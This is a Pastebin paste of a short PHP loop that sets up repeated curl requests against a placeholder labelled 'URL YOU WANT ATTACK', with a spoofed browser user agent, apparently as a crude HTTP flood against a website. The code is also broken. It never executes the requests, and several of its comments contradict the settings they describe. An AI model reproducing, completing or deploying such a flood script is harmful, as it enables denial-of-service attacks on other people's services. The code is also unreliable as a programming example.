Advertisement
Guest User

Untitled

a guest
Jan 16th, 2019
65
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.80 KB | None | 0 0
  1. for ($i=0;$i<999999999999999;$i++){
  2.  
  3. /**/
  4. $c=curl_init();
  5. curl_setopt($c,CURLOPT_URL,"URL YOU WANT ATTACK");
  6. curl_setopt($c,CURLOPT_DNS_USE_GLOBAL_CACHE,TRUE);//dns
  7. curl_setopt($c,CURLOPT_HEADER,0);//get the header
  8. curl_setopt($c,CURLOPT_CONNECTTIMEOUT ,10);//get the header
  9. curl_setopt($c,CURLOPT_NOBODY,0);//and *only* get the header
  10. curl_setopt($c,CURLOPT_RETURNTRANSFER,1);//get the response as a string from curl_exec(), rather than echoing it
  11. curl_setopt($c,CURLOPT_FRESH_CONNECT,1);//don't use a cached version of the url
  12. curl_setopt($c, CURLOPT_USERAGENT, 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:11.0) Gecko Firefox/11.0');
  13. curl_setopt($c, CURLOPT_HTTPHEADER, array('Content-type: application/x-www-form-urlencoded;charset=UTF-8' ));
  14.  
  15. echo "\n $i";
  16.  
  17. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement